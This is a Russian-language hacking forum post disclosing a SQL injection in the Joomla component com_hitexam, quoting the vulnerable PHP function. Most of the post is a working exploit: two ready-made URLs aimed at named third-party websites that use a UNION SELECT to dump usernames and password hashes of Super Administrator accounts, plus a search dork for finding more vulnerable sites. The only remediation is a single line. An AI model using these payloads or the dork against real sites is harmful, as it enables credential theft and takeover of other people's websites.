Показать сообщение отдельно
Старый 26.07.2011, 23:27   #23
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
Cool Joomla com_hitexam SQL-Inj

Что?? Моя любимая тема на второй позиции??? Не порядок)

Дата: 26,07,2011 16:00
Продукт: Joomla component com_hitexam, скачать _http://www.jomexperts.com/download/doc_details/5-hitexam.html?tmpl=component

Уязвимость: SQL-Inj

Автор: z0mbyak

Тип: удалённая
Опасность: 7 (так как это не прямая заливка и возможность закрыться сторонними фильтрами, например sweb)
Описание: Уязвимость существует из-за недостаточной фильтрации входящих данных:

PHP код:
function getLevels($id){
$db = $this->getDBO();
$sql = "select l.level,l.description,l.id as l_id,s.name,s.id from #__exam_levels as l, #__exam_ques_bank as q,#__exam_subjects as s where q.lvl_id=l.id and s.id=q.sub_id and q.published=1 and q.sub_id=$id";
$db->setQuery($sql);
$results = $db->loadObjectList();
return $results;
}


Эксплоит:
_http://www.e-v-r.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger
_http://www.mira15.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger

dork: inurl:"index.php?option=com_hitexam"

Для устранения уязвимости, нужно просто должным образом фильтровать входящие данные)
z0mbyak вне форума   Ответить с цитированием